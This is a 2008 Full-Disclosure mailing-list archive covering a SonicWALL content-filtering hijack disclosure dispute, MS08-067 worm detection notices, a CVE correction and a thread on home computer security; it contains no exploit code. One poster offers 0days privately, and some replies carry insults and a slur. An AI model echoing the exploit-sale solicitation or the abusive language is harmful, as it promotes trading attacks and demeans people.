From unknown.pentester at gmail.com  Sat Nov  1 03:04:33 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Sat, 1 Nov 2008 03:04:33 +0000
Subject: [Full-disclosure] Universal Website Hijacking by Exploiting
	Firewall Content Filtering Features + SonicWALL firewalls 0day
In-Reply-To: <5ae653bf0810311518u14272c60o19b133c3e288a529@mail.gmail.com>
References: <b7a807650810301931r268db052o6ca83ac6a4a6ce40@mail.gmail.com>
	<5ae653bf0810310131s3cc5d21cm2aacdd2c60f8dc73@mail.gmail.com>
	<b7a807650810310717x73ab7d59sf9ffb496b3fb2799@mail.gmail.com>
	<5ae653bf0810311518u14272c60o19b133c3e288a529@mail.gmail.com>
Message-ID: <b7a807650810312004x68d081cfqa2f50af147567af@mail.gmail.com>

Hi Fionnbharr,

Well, that's fair enough. tbh, I couldn't find older examples, but
this is one of the points of sending a post to the lists: other people
can review it and give feedback. I just sometimes wished people were
more constructive on FD.

Regarding the paper, well, it can be useful for people who want to
find a similar issue in their firewall/proxy appliances. Don't you
think?

No need to call anyone names IMO. And please, why do people keep
attacking Kaminsky? He has greatly contributed to the infosec
community so please give him some credit!

Thanks for your email anyway. Perhaps, you could have expressed
yourself in a less aggressive/more constructive manner?

Regards,
ap.

On Fri, Oct 31, 2008 at 10:18 PM, Fionnbharr <thouth at gmail.com> wrote:
> Sure, this attack vector has been 'discovered' by lots of people in
> the past, or even concurrently, thats my point. It doesn't merit a
> whole paper on it. Not to mention you're getting on the FUD/Kaminsky
> bandwagon when GNUtards release a statement like 'New technique to
> universally hijack websites', trying to get some media attention for
> something everyone else already knew.
>
> re: the bluecoat vuln, if you read my post I just said it was a recent
> (or as you might put it, *recent*) example of this type of
> vulnerability. I've this sort of vuln myself with client software and
> so has a number of other people I know. Glad to see the majority of
> your email is completely irrelevant.
>
>
> 2008/11/1 Adrian P <unknown.pentester at gmail.com>:
>> Hello Fionnbharr,
>>
>> Please see my response to your comments in-line.
>>
>> On Fri, Oct 31, 2008 at 8:31 AM, Fionnbharr <thouth at gmail.com> wrote:
>>> This isn't new. It isn't even a technique.
>>>
>>> http://www.bluecoat.com/support/securityadvisories/icap_patience
>>>
>>> A very recent example of this kind of vulnerability. My god you
>>> gnucitizen people are retarded. At least you didn't give it a
>>> ridiculous name like 'clickjacking'. Can you GNUtards please keep your
>>> 'research' into subjects people already know to yourself or at least
>>> not post it the lists, then at least I won't have to see it.
>>
>> That Bluecoat advisory was released on 29 September 2008. What makes
>> you think that I did not discover the SonicWALL vulnerability/vector
>> and reported it to ZDI *way before* that date? Well, FYI I reported it
>> to ZDI in June 2008 and discovered it even before.
>>
>> At least, you should consider the possibility of the attack vector
>> being discovered by two researchers concurrently. It can take quite a
>> few months before the vendor provides a patch, not to mention that
>> SonicWALL was VERY slow to confirm the vulnerability.
>>
>> Don't you know that responsible disclosure means that the details of a
>> vulnerability can be held for quite a while before being released to
>> the public? Since when the publishing date of an advisory is equal to
>> discovery date?
>>
>> Furthermore, it appears that Bluecoat only released their advisory
>> *after* the researcher jplopezy made his advisory public, which could
>> suggest that he did NOT inform the vendor before releasing the
>> details:
>>
>> http://www.securityfocus.com/archive/1/496940/30/0/threaded
>>
>> It's also interesting that the researcher released the advisory
>> (bugtraq post) one day *after* I published the general description of
>> the attack:
>>
>> June 25th, 2008.
>> ZDI forwards my findings to SonicWALL (see "Disclosure Timeline"):
>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>
>> September 20th, 2008.
>> I publish the general description of the attack:
>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-website-hijacking/
>>
>> September 21th, 2008.
>> Researcher jplopezy finds the same attack vector on BlueCoat's web filter:
>> http://www.securityfocus.com/archive/1/496577/30/0/threaded
>>
>> Notice jplopezy published the bugtraq post *one day after* I published
>> the general attack description on GNUCITIZEN. Interesting?
>>
>> Please do your homework before many any accusations.
>>
>>>
>>> Also "Malaysia: Cracking into Embedded Devices and Beyond!", who the
>>> fuck uses the word 'cracking' instead of 'hacking' in 2008? Sure for
>>> cracking passwords, but wow.
>>
>> Can't you accept the idea some some of us still consider hacking and
>> breaking into a system not necessarily the same thing?
>>
>> Regards,
>> ap.
>>
>>>
>>> 2008/10/31 Adrian P <unknown.pentester at gmail.com>:
>>>> Hello folks,
>>>>
>>>> Yesterday, I presented for the first time [1] a new method to perform
>>>> universal website hijacking by exploiting content filtering features
>>>> commonly supported by corporate firewalls. I briefly discussed [2] the
>>>> finding on GNUCITIZEN in the past without giving away the details, but
>>>> rather mentioning what the attacker can do and some characteristics of
>>>> the attack.
>>>>
>>>> Anyway, I'm now releasing full details on how the technique works, and
>>>> a real 0day example against SonicWALL firewalls.
>>>>
>>>> The paper can be found on the GNUCITIZEN labs site. Please let me know
>>>> if you can successfully use the same technique against firewalls by
>>>> other vendors:
>>>>
>>>> http://sites.google.com/a/gnucitizen.org/lab/research-papers
>>>>
>>>> Finally, I'd like to thank Zero Day Initiative [3] for their great
>>>> work and the Hack in the Box crew for organizing such a fine event!
>>>>
>>>> Regards,
>>>> ap.
>>>>
>>>> REFERENCES
>>>>
>>>> [1] "HITBSecConf2008 - Malaysia: Cracking into Embedded Devices and Beyond!"
>>>> http://conference.hackinthebox.org/hitbsecconf2008kl/?page_id=186
>>>>
>>>> [2] "New technique to perform universal website hijacking"
>>>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-website-hijacking/
>>>>
>>>> [3] "SonicWALL Content-Filtering Universal Script Injection Vulnerability"
>>>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>>>
>>>> --
>>>> Adrian "pagvac" Pastor | GNUCITIZEN
>>>> gnucitizen.org
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>



From h2glabs.infosec at gmail.com  Sun Nov  2 23:34:35 2008
From: h2glabs.infosec at gmail.com (H2G-Labs Information Security)
Date: Sun, 2 Nov 2008 20:34:35 -0300
Subject: [Full-disclosure] =?iso-8859-1?q?i_sh0t_the_white_hat_eDi=E7=E3O_?=
	=?iso-8859-1?q?4_=28PR0J3KT_M4YH3M_BR4Z1L=29?=
Message-ID: <e88054c90811021534y7e031efbmd95efbfc3211e8fc@mail.gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

The new version (4) of the "i sh0t the white hat" zine (PR0J3KT M4YH3M BR4Z1L).

URL: http://rs417.rapidshare.com/files/160091755/istwh4.txt

These guys do a good job counter some pseudo elite kids and CISSPs at Brazil.

In this version, we can see a funy hack counter Nash Leon (Glaudson O Campos).

:P

Regards...

- --
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG (PRIVATE)
Comment: H2G-Labs Information Security

iQIVAwUBSQ44+sJBTfehHgWwAQpL4A/5ARTMlcjCcPPyulpGRPBvinH57mwfYYgU
cccEyKSdm5B50b3CwlS3jbiThu2e18pyw/4Tam3OBNkboCeKpCjD1phsfXlIRo7+
QEyyOYXHVEqNDFT2xWoP1hTGNUhy6UtP3ePKWRrMn17lApzr/0WDajCxK/GlkvQH
53q0nT0pidrALqwDKvlV4D8T0Pw4farApIJSXyX0pbtfUPg4jQT8M52tBiEsusFj
zWWS/+ebZAtO6PiWS3F3TH0Whzn15il4fDCGkOpdrLy7Y42Gf+eVfSX+6/2WdTkE
YauId71qCb28dGYMeKz3jMtcMyZf5MK1Id7QmrTGXAHs1VYhq9Ex7RTXNkUV5BJt
HRvI/bPj5RGH/7N1cSUtgaA4VheHsEDrqegejpptFCR44qvkEIwoqCeU5w/5tYZ+
MY4z6UHEHsdSkIENGSUssrQuKN++mWQWV+45snQOT/Y3ttPD3gR4gz0JMgvtkZ/z
XA/+0ky3tcWKe8xSE5ewShQkpnBpIkrsRpaWq2Si5zNMVkoapuEP9iM+niQPnoxT
AAbEjz1MIx8j77DXW/v3ppj4oDBQcOXbaBhaZsC/y/Q6Nv8V0k4NLtmAtByyL9Mr
izK2TP/3CqzfIpTgoMItp3kuSJuKQso8Kd1bslqaYBtNrqUsl8GH9lNW0AN40z8y
b7i6yjaQtA8=
=bubu
-----END PGP SIGNATURE-----



From 3APA3A at SECURITY.NNOV.RU  Mon Nov  3 00:32:21 2008
From: 3APA3A at SECURITY.NNOV.RU (Vladimir '3APA3A' Dubrovin)
Date: Mon, 3 Nov 2008 03:32:21 +0300
Subject: [Full-disclosure] iDefense Security Advisory 10.30.08: Adobe
	PageMaker Key Strings Stack Buffer Overflow
In-Reply-To: <490A1803.9090909@idefense.com>
References: <490A1803.9090909@idefense.com>
Message-ID: <81123797.20081103033221@SECURITY.NNOV.RU>

Dear iDefense Labs,



--Thursday, October 30, 2008, 11:24:35 PM, you wrote to bugtraq at securityfocus.com:


iL> VII. CVE INFORMATION

iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the
iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in
iL> the CVE list (http://cve.mitre.org/), which standardizes names for
iL> security problems.

I bet it should be CVE-2007-6432

-- 
~/ZARAZA http://securityvulns.com/




From xploitable at gmail.com  Sun Nov  2 05:38:20 2008
From: xploitable at gmail.com (n3td3v)
Date: Sun, 2 Nov 2008 05:38:20 +0000
Subject: [Full-disclosure] Securing our computers?
Message-ID: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>

does anyone have good ideas on how to secure our computers better? is
it a problem at the user end, or a problem at the corporate and
government end? should it be upto vendors to provide security to
operating systems, or should it be the end users responsibility to
learn the skills required to use a computer safe and securely, and its
data assets that might be stored on the systems? these are the sorts
of questions you should ask yourself. should we really have operating
systems with a built in firewall that is turned on by default, what i
call back seat driver security.this is a term im using for vendors who
provide end users will ready to go security measures, but don't teach
its users about security, they just provide the security mechanisms to
the user, without telling the user about security and why its
important for the firewall to be there. should security be expected,
back seat security? or should we be road mapping with the end user, by
saying, we provide you with default security, but we want you to learn
more about the security of computers, and all its technical and
non-technical surroundings. is it healthy that vendors are back
seating its users by providing point, click security which is
extremely lazy for the end user. the end user doesn't need to do
anything, or think about anything to do with computer security,
because its already provided by the vendor. the problem arises when
new threats come about and the security that the user expects can't
protect their computer and its data because the vendor hasn't had time
to notify its security response staff and build and release a patch.
so what layer of protection does the end user with point and click
back seat security have against a new emerging threat to our computer
systems? none. the vendors don't provide the education for the end
user to mitigate new emerging threats, they are told to wait for a
patch, there are no effective workarounds usually that you can use to
protect yourself from a new emerging threat, workarounds usually only
make it less likely you'll be infected with malicious code, but i
don't think its security, its just the best we can do. should we not
force our users to learn about computer security instead of providing
them with instant-on security? the real threats come from those
vulnerabilities that are not-yet-patched, where the operating system
is at its most vulnerable, yet the user has no clue about what's going
on, because they haven't been encouraged by the vendor, to learn about
security, its just expected by the user that the system is 1) not
break in able and 2) hasn't already been compromised. if you turn your
computer on and everything looks in place and as it should, you
suggest to yourself you haven't been hacked, however that is not the
case, although that is the mindset the end user has, if everything
looks ok, then it probably is or so they assume. do you ever think
what could be happening to your computer while your screensaver is
running, could this be the perfect opportunity for a hacker, to start
looking around the system files, a tip off perhaps that you are away
from the computer, and can't see what's going on behind the graphic
that is screensaving your operating system? these are the kind of
questions we should be asking ourselves, because security is assumed
by the end user, they are putting an incredible amount of trust in the
vendor who provides the software, and is it healthy to have your data
security in the hands of the vendor. when you buy say microsoft
windows you don't own that software, you own a licence to run it on
your systems, you never actually own the product, you are merely
signing an agreement that microsoft has given you permission to use
the software. the code is infact secret and will probably stay that
way for some time, because its how they work, they don't like "free",
they don't make money from "free" so they keep the code base secret
from the user who owns the licence to run the software, although the
user doesn't know exactly what it is that is running on their system,
as they don't have open source to view what's really going on. with
companies such as microsoft keeping its source code a secret, you've
got to wonder what are they hiding, and why should you put your trust
in such a large corporation to not only provide the services you agree
on the software licence but the security of not only you and your
computer, but the data that is held on that software. its all about
trusting the security of the operating system, and people seem to
trust big companies with their security, but are they trustable? its a
huge amount of trust you give microsoft everytime you agree to their
licence terms, most people just sit back and agree, most don't even
read the small print, this is sad. you are running a software that you
don't own, are merely borrowing the use of, and that software will
eventually expire and you need to repay the company every say 4 to 8
years per software life cycle. so essentially, why are you using
microsoft windows, and why are you putting your trust in them? not
only that but why are they providing security to the end user, without
sharing the code or encouraging the end user to find out more about
security. like i said, security is assumed, but it cannot be
guaranteed. they don't say hey, its a pretty good idea that you know
about new threats and how to mitigate them, the end user shouldn't be
relying on security professionals to keep their data secure, there is
nothing a security professional knows that the end-user can't find
out, so why are we not steering the end user towards computer security
websites? because they don't want to learn, they don't see the need to
learn, the security is provided by the vendor, the one we put our
trust in to provide a secure code base to run our commands in a
graphical environment. the end-user doesn't know about security, the
end-user doesn't really understand what it is that is running, they
know its microsoft windows, but do they know about the possible threat
vectors, and are they up-to-speed with security news? no, but they
should be but aren't encouraged to be or even think about security,
because the vendor does it for them, the people you trust.



From biz.marqee at gmail.com  Mon Nov  3 04:31:35 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Mon, 3 Nov 2008 15:31:35 +1100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
Message-ID: <a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>

tl;dr

now i am going back to my real job, doing real things and you can go back to
playing with lego and waiting for your mother to bring in some sandwiches
cut into triangles. without the crust.

faggot.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/3bc7b581/attachment.html 

From Valdis.Kletnieks at vt.edu  Mon Nov  3 04:59:31 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Nov 2008 23:59:31 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Sun, 02 Nov 2008 05:38:20 -0000."
	<4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
Message-ID: <45950.1225688371@turing-police.cc.vt.edu>

On Sun, 02 Nov 2008 05:38:20 -0000, n3td3v said:
> does anyone have good ideas on how to secure our computers better?

Good ideas?  Those of us who have been doing this for decades have *plenty*
of those.

Good ideas that are both (a) practically deployable and (b) workable in
practice?  Those are in short supply.

Your long rant is just beginning to scratch the *surface* of the issues involved.

There's a very basic design problem:  People think they want their computers
to be generalized Von Neumann architectures, and resist attempts to give them
something that's more a Harvard architecture - go look at the debacle that
was WebTV for what happens when you try to give them a closed-box that's
no-user-modifiable-parts-inside by design.

It's *easy* to design an appliance that's reasonably secure.  Look at the
relative difficulty of hacking a Wii compared to hacking a Windows XP box.

What we *don't* know how to do is make a system that Joe Sixpack is allowed
to screw around with, and yet prevent security issues from happening.  The
only *real* solution here is to invent a better Joe Sixpack that's able to
understand that security should be more important than the neat screensaver
he just downloaded with no clue as to the code's provenance.

Unfortunately, the Joe Sixpacks tend to marry Jill Sixpacks, and reproduce.
Anybody who's read CM Kornbluth's "The Marching Morons" will immediately
recognize it as the *current* situation of most white hats.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081102/9c3e31ac/attachment.bin 

From antisec.0day at gmail.com  Mon Nov  3 07:37:23 2008
From: antisec.0day at gmail.com (anti security)
Date: Mon, 3 Nov 2008 08:37:23 +0100
Subject: [Full-disclosure] 0day offer.
Message-ID: <bc62aa7c0811022337q6709a7a7l2cc29268a34ca115@mail.gmail.com>

Dear people,

I 'm proposing some really interesting 0days for Windows && Linux. Please
answer only by private email.

See you soon
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/9a9242c9/attachment.html 

From xploitable at gmail.com  Mon Nov  3 08:18:26 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 08:18:26 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <45950.1225688371@turing-police.cc.vt.edu>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<45950.1225688371@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310811030018j59a4fe45u9422bc05b7769f95@mail.gmail.com>

a discussion on n3td3v mailing list is talking about stateless
computing to take the security responsibility away from the single mom
and retired couple crowd. some on the mailing list think that is the
answer to security problems, but i don't agree i think its just
shifting the problems to different places. again, if stateless
computing and cloud computing is going to become a big thing for joe
average sixpack, then the issue of trust comes into play again. are we
to trust big corporations with stateless computing if all our data is
to be held at one central data farm and for the majority of joe
average sixpack computers to become something that resembles dumb
terminals.

On Mon, Nov 3, 2008 at 4:59 AM,  <Valdis.Kletnieks at vt.edu> wrote:
> What we *don't* know how to do is make a system that Joe Sixpack is allowed
> to screw around with, and yet prevent security issues from happening.  The
> only *real* solution here is to invent a better Joe Sixpack that's able to
> understand that security should be more important than the neat screensaver
> he just downloaded with no clue as to the code's provenance.
>
> Unfortunately, the Joe Sixpacks tend to marry Jill Sixpacks, and reproduce.
> Anybody who's read CM Kornbluth's "The Marching Morons" will immediately
> recognize it as the *current* situation of most white hats.



From mcwidget at gmail.com  Mon Nov  3 10:08:01 2008
From: mcwidget at gmail.com (mcwidget)
Date: Mon, 3 Nov 2008 10:08:01 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <45950.1225688371@turing-police.cc.vt.edu>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<45950.1225688371@turing-police.cc.vt.edu>
Message-ID: <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>

>
> What we *don't* know how to do is make a system that Joe Sixpack is allowed
> to screw around with, and yet prevent security issues from happening.
>

This is the real problem.  There are *some* things that can be done, I'd
like to see some form of NAP built into home routers that verifies your home
PC against a baseline before allowing you to go online.  You want to go to
Google?  Sure, but your AV's out of date and you've missed this week's
patches, how about I only let you to norton.com and microsoft.com until
you've updated?  Let users do what they want with their PCs and put some of
the security logic in the 'other' machine they have at home.  What if they
want to go online without updating though?

Therein is where most solutions will fall down.  Either end/home users are
allowed full control of their machines to do with what they will or that
control is completely taken away from them - there's no middle ground.
Given that, even though the user is currently the weakest link in the
security chain it's a link that should be regarded as inherently insecure.
Fixing the user is the obvious solution but it's also the least likely.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/2425b032/attachment.html 

From Valdis.Kletnieks at vt.edu  Mon Nov  3 10:33:00 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 05:33:00 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Mon, 03 Nov 2008 10:08:01 GMT."
	<4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<45950.1225688371@turing-police.cc.vt.edu>
	<4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
Message-ID: <62583.1225708380@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 10:08:01 GMT, mcwidget said:

> This is the real problem.  There are *some* things that can be done, I'd
> like to see some form of NAP built into home routers that verifies your home
> PC against a baseline before allowing you to go online.  You want to go to
> Google?  Sure, but your AV's out of date and you've missed this week's
> patches, how about I only let you to norton.com and microsoft.com until
> you've updated?  Let users do what they want with their PCs and put some of
> the security logic in the 'other' machine they have at home.  What if they
> want to go online without updating though?

Given the number of things that simply aren't detected/removed by current
AV solutions, what makes you think that this would make any real measurable
difference?

For that matter, what makes you think that this hypothetical NAP would be
any more secure?  Hint 1: consider the security of most consumer-grade
cablemodems before you answer.  Hint 2: How does this NAP identify that
you're behind on AV updates?

> Therein is where most solutions will fall down.  Either end/home users are
> allowed full control of their machines to do with what they will or that
> control is completely taken away from them - there's no middle ground.

And somehow, I doubt people will buy an XBox 360 that happens to have IE, MS
Office, and an IM client installed on it (even if that's what they actually
*need*).

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/dc255bb1/attachment.bin 

From mcwidget at gmail.com  Mon Nov  3 11:26:30 2008
From: mcwidget at gmail.com (mcwidget)
Date: Mon, 3 Nov 2008 11:26:30 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <62583.1225708380@turing-police.cc.vt.edu>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<45950.1225688371@turing-police.cc.vt.edu>
	<4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
	<62583.1225708380@turing-police.cc.vt.edu>
Message-ID: <4e324cb0811030326t168d1616q5e4f9bc025bdde83@mail.gmail.com>

>
> Given the number of things that simply aren't detected/removed by current
> AV solutions, what makes you think that this would make any real measurable
> difference?
>
> For that matter, what makes you think that this hypothetical NAP would be
> any more secure?
>

A solution like this wouldn't make any difference to  users who already keep
their AV / patch status up-to-date, of course it wouldn't.  What it may do,
is increase the % of home users who keep their AV / patch status
up-to-date.  This, would be a Good Thing.

As to the security of the box itself, you're right, it may not be any more
secure than any cable modem box currently out there.  What could be done
though, is the security on these boxes could be tightened/restricted to our
heart's content as this would not impact the user's everyday use.

Most user's want their home PCs to be secure.  The problem is, they want
ease-of-use more.  I've lost count of the number of user's who think they
*need* a firewall but who automatically click "Allow" on their firewall
pop-ups because "that stopped it coming back".  By moving some security
logic onto a different box in the home, that box can be tightened/restricted
without affecting the user.

This isn't a silver bullet, of course there are problems with this.  This is
intended as an example of things that may help.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/9ace4b1a/attachment.html 

From antisec.0day at gmail.com  Mon Nov  3 11:36:25 2008
From: antisec.0day at gmail.com (anti security)
Date: Mon, 3 Nov 2008 12:36:25 +0100
Subject: [Full-disclosure] Odays offers
Message-ID: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>

Dear people,

I 'm proposing some really interesting 0days for Windows && Linux. Please
answer only by private email.

See you soon
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/37248a37/attachment.html 

From viktor.larionov at salva.ee  Mon Nov  3 11:54:44 2008
From: viktor.larionov at salva.ee (Viktor Larionov)
Date: Mon, 3 Nov 2008 13:54:44 +0200
Subject: [Full-disclosure] Odays offers
In-Reply-To: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
Message-ID: <CBEGIFDHGBLGDCJDOKAPEEEGDKAA.viktor.larionov@salva.ee>

[Viktor Larionov] >>  See you soon 

In jail. :)

vik 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/f8b762b8/attachment.html 

From infolookup at gmail.com  Mon Nov  3 12:29:16 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Mon, 3 Nov 2008 12:29:16 +0000
Subject: [Full-disclosure] 0day offer.
In-Reply-To: <bc62aa7c0811022337q6709a7a7l2cc29268a34ca115@mail.gmail.com>
References: <bc62aa7c0811022337q6709a7a7l2cc29268a34ca115@mail.gmail.com>
Message-ID: <328727592-1225715340-cardhu_decombobulator_blackberry.rim.net-1699214772-@bxe360.bisx.prod.on.blackberry>

Stop being a spammer!!!!!
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: "anti security" <antisec.0day at gmail.com>

Date: Mon, 3 Nov 2008 08:37:23 
To: <full-disclosure at lists.grok.org.uk>
Subject: [Full-disclosure] 0day offer.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From juha-matti.laurio at netti.fi  Mon Nov  3 13:52:13 2008
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Mon, 3 Nov 2008 15:52:13 +0200 (EET)
Subject: [Full-disclosure] Windows RPC worm (MS08-067) in the wild
Message-ID: <27140334.291881225720334202.JavaMail.juha-matti.laurio@netti.fi>

The worm-type exploitation has started. More information at
http://www.f-secure.com/weblog/archives/00001526.html

The worm component has reportdly detection name Exploit.Win32.MS08-067.g and the kernel component Rootkit.Win32.KernelBot.dg, in turn.

Symantec uses Worm category too and the name W32.Wecorl:
http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-110306-2212-99&tabid=2

Juha-Matti



From arasm at vt.edu  Mon Nov  3 14:05:45 2008
From: arasm at vt.edu (Memisyazici, Aras)
Date: Mon, 3 Nov 2008 09:05:45 -0500
Subject: [Full-disclosure] Securing our computers?
Message-ID: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>

<mcwidget said>:

>> the security on these boxes could be tightened/restricted to our
heart's content as this would not impact the user's everyday use.

:) As someone who shares geographical commonality and is honored to be a 'padowan' of Valdis, when I brought up something very similar to this argument a while back, I was smacked down so bad by him and his peers, it still hurts to remember that day! :p

In any event, before ya'll make even more 'human' comments like the one above, please consider that:

A) you are dealing with an extremely considerate and intelligent man who has and continues to put up with this very question among many other things on a daily basis, while pretending to be a regular IT guy :)

B) The suggestion you made mcwidget is pretty much (I'm very sad to agree) 'just not worth it'...

To expand, design a model keeping the following factors in mind:

* cost of implementing such technique onto existing hardware (i.e. Openwrt like systems) vs. distributing new hardware

* cost of the load that will be placed on the vendor's support team for this project (don't forget that vendors will be hiring Punjab-I-read-Scripts farms so calculate for the 'hold please!' and the customer getting so aggravated due to false-neg's/pos's or just plain non-functionality that they cont. To waste support resources over and over and ...)

* cost of maintaining a team of clued -IT prof.'s who will create/update a central db of sig's on extreme hardware by cooperating with other vendors who will deliberately shoot down attempts b/c such a product will drive down their sales (not everyone cares for the greater good, in today's greedy society)

* speed of adaptation of said technology, given all the lovely comments it will be receiving from early-Joe/Jill Sixpackers blogs/sites who had no idea how to use it other than they were told it's a 'Good Thing', and given a Flash video demonstrating how they can implement the device with it's color-coded cabling and free-of-charge 1st support call if all else failed!

* The cost on the vendor with all the returns it receives back

***###***###***###***###***###***### (there were more factors but after the 6th or 7th hit to the back of the head, you tend to lose way too many memory cells to remember all :p)

Now... Don't get me wrong, I totally agree with you, at first it sounds like a great idea to implement NAC/P like technology for the reg. Joe/Jill out there... But as you can all deduce it's just not pheaseable in the 'Real World'. 

As for your original comment and why I singled it out...

So... Your scenario assumed successful  implementation of the tech. by the user... And totally disregarded false-negatives and false-positives... So here's Joe Sixpack staring at this warning sign saying, 'according to our immature calculations 'something isn't  right', so we're gonna let you figure that out by allowing you to only go to our approved 3rd party/marketing associate sites (which others can also join the network for a pheaseable fee) or by calling us at 800-OUTSRC-IT and wasting 2-3 hours on the phone to figure out that our central db doesn't include signatures for your AV/firewall/anti-malware combo yet...

Sincerely,
Aras 'Russ' Memisyazici
Systems Administrator

Office of the Vice President for Research
Virginia Tech



From juha-matti.laurio at netti.fi  Mon Nov  3 14:39:13 2008
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Mon, 3 Nov 2008 16:39:13 +0200 (EET)
Subject: [Full-disclosure] Windows RPC worm (MS08-067) in the wild
Message-ID: <30135925.297171225723154006.JavaMail.juha-matti.laurio@netti.fi>

Kaspersky detect the new wave as
Exploit.Win32.MS08-067.g

and Microsoft as
Exploit:Win32/MS08067.gen!A

Sophos uses name Mal/Generic-A.

One of the reported file size is 16,384 bytes:
http://www.threatexpert.com/report.aspx?uid=919a973d-9fe1-4196-b202-731ebaaffa5d

Windows RPC vulnerability (MS08-067) FAQ has been updated to include these detection names:
http://blogs.securiteam.com/index.php/archives/1150

Juha-Matti

Juha-Matti Laurio [juha-matti.laurio at netti.fi] kirjoitti: 
> The worm-type exploitation has started. More information at
> http://www.f-secure.com/weblog/archives/00001526.html
> 
> The worm component has reportdly detection name Exploit.Win32.MS08-067.g and the kernel component Rootkit.Win32.KernelBot.dg, in turn.
> 
> Symantec uses Worm category too and the name W32.Wecorl:
> http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-110306-2212-99&tabid=2
> 
> Juha-Matti
> 



From Valdis.Kletnieks at vt.edu  Mon Nov  3 14:46:09 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 09:46:09 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Mon, 03 Nov 2008 09:05:45 EST."
	<0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
References: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
Message-ID: <74343.1225723569@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 09:05:45 EST, "Memisyazici, Aras" said:

> * cost of maintaining a team of clued -IT prof.'s who will create/update a
> central db of sig's on extreme hardware by cooperating with other vendors who
> will deliberately shoot down attempts b/c such a product will drive down their
> sales (not everyone cares for the greater good, in today's greedy society)

Actually Russ - you're not quite right on this one.  Down in the trenches,
the various A/V techies *do* cooperate across company boundaries an awful
lot - although actual signatures aren't much use to exchange because the
engines that interpret them are proprietary and dissimilar, samples get
exchanged *all* the time (where do you *think* all those samples that get
sent to virustotal.com go? :), and hints/suggestions of what they've managed
to RE of the sample's structure and behavior - "Hey, it's using the WizBang
